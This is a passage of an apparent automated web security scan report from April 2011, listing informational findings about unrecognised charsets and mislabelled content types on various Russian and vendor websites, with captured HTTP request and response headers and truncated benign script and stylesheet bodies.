Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 1364

/*************************************************
   . Copyright 2006 - 2008 Tres Media Group, Inc.
   The code contained within cannot be reproduced
   or modified without the expressed permission of:
   Tr
...[SNIP]...

31.27. http://www.tresware.com/javascript/edittags.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tresware.com
Path:	/javascript/edittags.php

Request

GET /javascript/edittags.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 1561

adminbuttonsFlag = false;
function adminbuttons() {

   var divareas = document.getElementsByTagName('button');
   var editbuttons = new Array();
   for(var i in divareas) {
       if(divareas[i].id) {

...[SNIP]...

31.28. http://www.tresware.com/javascript/image_pop.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tresware.com
Path:	/javascript/image_pop.php

Request

GET /javascript/image_pop.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 2298

// <a href="me.jpg" onclick="return popImage(this.href,'Site author');">link</a>

//really not important (the first two should be small for Opera's sake)
PositionX = 10;
PositionY = 10;
defaultWi
...[SNIP]...

31.29. http://www.tresware.com/javascript/showimages.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tresware.com
Path:	/javascript/showimages.php

Request

GET /javascript/showimages.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 317

function showimage() {
   if (!document.images)
       return
       document.images.avatar.src= 'images/Avatars/' + document.Register.av_avatar_pre.options[document.Register.av_avatar_pre.selectedIndex].value
...[SNIP]...

32. HTML uses unrecognised charset previous next
There are 7 instances of this issue:

http://b2bcontext.ru/services/advertisement/getblock
http://ideco-software.ru/products/ims/
http://mail.ru/
http://my.webalta.ru/
http://vkontakte.ru/
http://vkontakte.ru/login.php
http://www.gartner.com/include/webtrends.jsp

32.1. http://b2bcontext.ru/services/advertisement/getblock previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://b2bcontext.ru
Path:	/services/advertisement/getblock

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

windows-1251

Request

GET /services/advertisement/getblock?17723897 HTTP/1.1
Host: b2bcontext.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:47:19 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 30189

var b2bctb_id_12402960=b2bctb_rand;var keyg_12402960=new Array();var keyb_12402960=new Array();var b2b_check_urls_dim=[{id:4,atr:"iuuq;00xnnbjm/sv"},{id:8,atr:"iuuq;00xxx/xnnbjm/sv"},{id:12,atr:"iuuq;
...[SNIP]...

32.2. http://ideco-software.ru/products/ims/ previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://ideco-software.ru
Path:	/products/ims/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

windows-1251

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 14:35:59 GMT
Server: Microsoft-IIS/6.0
Connection: Close
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: dv=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: Query=/products/ims/index.html?utm_source=dir&utm_medium=cpc&utm_campaign=d1010_mail1&utm_term=mail_ics2&utm_content=10013; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: FirstVisit=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fkdyl055c3sg0uuma045oy45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=windows-1251
Content-Length: 21815

<html>
<head>
<script type="text/javascript" src="/dropmenu/jquery.js" />
</script>
<script type="text/javascript" src="/dropmenu/hmenu.js"
...[SNIP]...
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<link rel="stylesheet" href="/main.css" type="text/css">
...[SNIP]...

32.3. http://mail.ru/ previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://mail.ru
Path:	/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

windows-1251

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:24:37 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: Mpopl=721425857; expires=Mon, 25 Apr 2011 14:39:37 GMT; path=/; domain=.mail.ru
Set-Cookie: mrcu=D5824DB584250497422EF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:37 GMT; path=/; domain=.mail.ru
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Sun, 25 Apr 2010 14:24:37 GMT
Last-Modified: Mon, 25 Apr 2011 18:24:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 114440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head
...[SNIP]...
</title>
<meta http-equiv="content-type" content="text/html; charset=windows-1251" />
<meta name="keywords" content="....., .......... ........... ....., ...., ......., ....., ......, ......, .........., ........, ........, ......" />
...[SNIP]...

32.4. http://my.webalta.ru/ previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://my.webalta.ru
Path:	/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET / HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:24:42 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Last-Modified: Thu, 28 Oct 2010 08:27:59 GMT
ETag: "15d8003-4d5d-4cc9340f"
Accept-Ranges: bytes
Content-Length: 19805

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
   <title>MyWebalta</title>

   <meta http-equiv="Content-Type" content="text/html; charset="utf-8">
   <meta name="keywords" content="xlst">
...[SNIP]...

32.5. http://vkontakte.ru/ previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://vkontakte.ru
Path:	/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

windows-1251

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Mon, 25 Apr 2011 14:23:04 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: remixchk=5; expires=Tue, 17-Apr-2012 02:49:46 GMT; path=/; domain=.vkontakte.ru
Pragma: no-cache
Cache-control: no-store
Vary: Accept-Encoding
Content-Length: 12904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<script type="
...[SNIP]...
<link rel="shortcut icon" href="/images/faviconnew.ico" />

<meta http-equiv="content-type" content="text/html; charset=windows-1251" />
<meta name="description" content="<b>
...[SNIP]...

32.6. http://vkontakte.ru/login.php previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://vkontakte.ru
Path:	/login.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

windows-1251

Request

Response

32.7. http://www.gartner.com/include/webtrends.jsp previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.gartner.com
Path:	/include/webtrends.jsp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

ISO8859_1

Request

GET /include/webtrends.jsp HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/DisplayDocument?doc_cd=127481
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303732853510:ss=1303732853510; TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:10:48 GMT
Content-type: text/html; charset=ISO8859_1
Date: Mon, 25 Apr 2011 12:10:48 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
X-PvInfo: [S10203.C10821.A151026.RA0.G24F27.UD4EB7C80].[OT/html.OG/pages]
Vary: Accept-Encoding
Content-Length: 22376




<!-- 2006/10/30: Modified by
...[SNIP]...

33. Content type incorrectly stated previous next
There are 94 instances of this issue:

http://an.yandex.ru/code/47934
http://an.yandex.ru/code/57617
http://an.yandex.ru/code/66894
http://ar.voicefive.com/b/rc.pli
http://auto.webalta.ru/favicon.ico
http://auto.webalta.ru/public/css/style-auto.css
http://auto.webalta.ru/public/js/webalta.js
http://b2bcontext.ru/services/advertisement/getblock
http://css.loveplanet.ru/3/img/pda/main.js
http://direct.yandex.ru/pages/direct/_direct-1303387947.js
http://direct.yandex.ru/pages/index/_index-1303387946.js
http://event.adxpose.com/event.flow
http://foreign.dt00.net/zones/form4.js
http://foreign.dt00.net/zones/zone1.php
http://foreign.dt00.net/zones/zone23.php
http://foreign.dt00.net/zones/zone25.php
http://foreign.dt00.net/zones/zone40.php
http://games.webalta.ru/public/css/style-games.css
http://goods.adnectar.com/analytics/get_avia_js
https://hourly.deploy.com/images/logo.jpg
http://img.webalta.ru/public/css/style.css
http://img.webalta.ru/public/js/webalta.js
http://js.dt00.net/public/smi/elastic/24.js
http://kino.webalta.ru/banners.xml
http://kino.webalta.ru/sc/l/loach.js
http://l-files.livejournal.net/userapps/10/image
http://l-files.livejournal.net/userapps/2/image
http://l-files.livejournal.net/userapps/3/image
http://l-files.livejournal.net/userapps/4/image
http://l-files.livejournal.net/userapps/9/image
http://l-files.livejournal.net/vgift/445/small
http://learn.shavlik.com/shavlik/userCheck.cfm
http://limg.imgsmail.ru/mail/ru/css/search_top.css
http://mbox9e.offermatica.com/m2/eset/mbox/standard
http://my.webalta.ru/feed/l.php
http://my.webalta.ru/public/engine/app.js
http://my.webalta.ru/public/engine/catalog/general.txt
http://my.webalta.ru/public/engine/fw/fw_cookies.js
http://my.webalta.ru/public/engine/move.js
http://my.webalta.ru/public/engine/page.js
http://my.webalta.ru/public/engine/reader.js
http://my.webalta.ru/public/engine/settings.js
http://my.webalta.ru/public/engine/skinpacks.js
http://my.webalta.ru/public/engine/templates.js
http://my.webalta.ru/public/engine/widget/browse/widget_script.js
http://my.webalta.ru/public/engine/widget/flash/widget_script.js
http://my.webalta.ru/public/engine/widget/gameboss/widget_script.js
http://my.webalta.ru/public/engine/widget/labpixies/widget_script.js
http://my.webalta.ru/public/visual/index.css
http://my.webalta.ru/public/visual/theme.css
http://my.webalta.ru/public/visual/themes/css.php
http://now.eloqua.com/visitor/v200/svrGP.aspx
http://pogoda.webalta.ru/favicon.ico
http://pogoda.webalta.ru/public/css/style-weather.css
http://pogoda.webalta.ru/public/js/search.js
http://smiimg.dt00.net/smi/2011/04/20110414khlopin-75x75.jpg
http://tengrinews.kz/static/js/remainNY.js
http://translate.googleapis.com/translate_a/t
http://vkontakte.ru/js/lang0_0.js
http://www.eset.com/us/scripts/business.js
http://www.eset.com/us/scripts/common.js
http://www.eset.com/us/scripts/elqNow/elqCfg.js
http://www.eset.com/us/scripts/elqNow/elqImg.js
http://www.eset.com/us/scripts/lib/autocompleter/Autocompleter.js
http://www.eset.com/us/scripts/lib/jq-promo-lib.js
http://www.eset.com/us/scripts/lib/jq.js
http://www.eset.com/us/scripts/lib/mbox.js
http://www.eset.com/us/scripts/lib/mootools-1.2.3-core-yc.js
http://www.eset.com/us/scripts/lib/s_code3.js
http://www.eset.com/us/scripts/store.js
https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
http://www.gartner.com/include/webtrends.jsp
http://www.gartner.com/technology/include/metricsHelper.jsp
http://www.iveco-ptc.spb.ru/images/menu/4d95d099884d7.gif
http://www.livejournal.com/favicon.ico
http://www.livejournal.com/tools/endpoints/journalspotlight.bml
http://www.manageengine.com/images/bandwidth-monitoring.gif
http://www.manageengine.com/images/ip-sla-voip-monitoring.gif
http://www.manageengine.com/images/network-configuration-management.gif
http://www.manageengine.com/images/network-health-monitoring.gif
http://www.manageengine.com/images/network-mapping.gif
http://www.manageengine.com/images/traffic-analysis.gif
http://www.manageengine.com/images/wan-monitoring.gif
http://www.netsuite.com/portal/javascript/effects.js
http://www.netsuite.com/portal/javascript/prototype.js
http://www.smpone.com/javascript/common.php
http://www.smpone.com/javascript/image_pop.php
http://www.smpone.com/javascript/showimages.php
http://www.tresware.com/javascript/bbcode.php
http://www.tresware.com/javascript/common.php
http://www.tresware.com/javascript/edittags.php
http://www.tresware.com/javascript/image_pop.php
http://www.tresware.com/javascript/showimages.php
http://www.trucklist.ru/webroot/delivery/js/scripts.js

33.1. http://an.yandex.ru/code/47934 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://an.yandex.ru
Path:	/code/47934

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

Response

33.2. http://an.yandex.ru/code/57617 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://an.yandex.ru
Path:	/code/57617

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

Response

33.3. http://an.yandex.ru/code/66894 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://an.yandex.ru
Path:	/code/66894

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

Response

33.4. http://ar.voicefive.com/b/rc.pli previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ar.voicefive.com
Path:	/b/rc.pli

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p97174789&1303741250889 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:31:26 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 42

COMSCORE.BMX.Broker.handleInteraction("");

33.5. http://auto.webalta.ru/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://auto.webalta.ru
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: auto.webalta.ru
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; MG_id=8504; MG_type=news; __utmz=148001959.1303741225.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; MG_1668=2; __utma=148001959.511646108.1303741225.1303741225.1303741225.1; __utmc=148001959; __utmb=148001959.2.10.1303741225

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:23:37 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 04 Feb 2011 08:10:09 GMT
ETag: "c8010a-37e-49b70691d1a40"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

33.6. http://auto.webalta.ru/public/css/style-auto.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://auto.webalta.ru
Path:	/public/css/style-auto.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/css

The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /public/css/style-auto.css HTTP/1.1
Host: auto.webalta.ru
Proxy-Connection: keep-alive
Referer: http://auto.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 10 Feb 2011 08:07:18 GMT
ETag: "8680c5-17af-49be911f81980"
Accept-Ranges: bytes
Content-Length: 6063
Connection: close
Content-Type: text/css

body {padding:0; margin:0 3px 10px; background-color:#FFF;}
body, a, div, td {font:normal 12px Tahoma; color:#666;}

a, a:hover {text-decoration:none;}
a:hover {text-decoration:underline;}

.lin
...[SNIP]...

33.7. http://auto.webalta.ru/public/js/webalta.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://auto.webalta.ru
Path:	/public/js/webalta.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/js/webalta.js HTTP/1.1
Host: auto.webalta.ru
Proxy-Connection: keep-alive
Referer: http://auto.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 14 Dec 2010 16:41:55 GMT
ETag: "d182a6-158f-497617f95fac0"
Accept-Ranges: bytes
Content-Length: 5519
Connection: close
Content-Type: application/x-javascript

// version 2

function $$(target)
{
   return document.getElementById(target);
}

function newsSetCategory(n)
{
   var i;
   var item;
   var button;

   n = n || 0;

   for(i = 0; i < 10; i++)

...[SNIP]...

33.8. http://b2bcontext.ru/services/advertisement/getblock previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://b2bcontext.ru
Path:	/services/advertisement/getblock

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=windows-1251

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

33.9. http://css.loveplanet.ru/3/img/pda/main.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://css.loveplanet.ru
Path:	/3/img/pda/main.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /3/img/pda/main.js HTTP/1.1
Host: css.loveplanet.ru
Proxy-Connection: keep-alive
Referer: http://pda.loveplanet.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:51:47 GMT
Content-Type: application/x-javascript; charset=UTF-8
Last-Modified: Fri, 22 Apr 2011 08:57:07 GMT
Connection: keep-alive
Expires: Mon, 25 Apr 2011 17:51:47 GMT
Cache-Control: max-age=10800
Content-Length: 5733

function onLoadPage(){return true;}

/* -------------------------------------------------------------
Opening and closing blocs
------------------------------------------------------------- */
f
...[SNIP]...

33.10. http://direct.yandex.ru/pages/direct/_direct-1303387947.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://direct.yandex.ru
Path:	/pages/direct/_direct-1303387947.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript; charset=utf-8

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

Response

33.11. http://direct.yandex.ru/pages/index/_index-1303387946.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://direct.yandex.ru
Path:	/pages/index/_index-1303387946.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript; charset=utf-8

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /pages/index/_index-1303387946.js HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
Referer: http://direct.yandex.ru/?partner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:02 GMT
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 21 Apr 2011 12:12:26 GMT
Connection: keep-alive
Expires: Tue, 26 Apr 2011 14:36:02 GMT
Cache-Control: max-age=86400
Content-Length: 13173

var key="",time="",is_mediaplan;var submit_flag=false;var SCRIPT="/registered/main.pl";var MAX_URL_LENGTH=1024;Array.prototype.__fftrap=function(){};function AdvqLite(m,c,g,j,t){var q=800,l=600;var s=
...[SNIP]...

33.12. http://event.adxpose.com/event.flow previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://event.adxpose.com
Path:	/event.flow

Issue detail

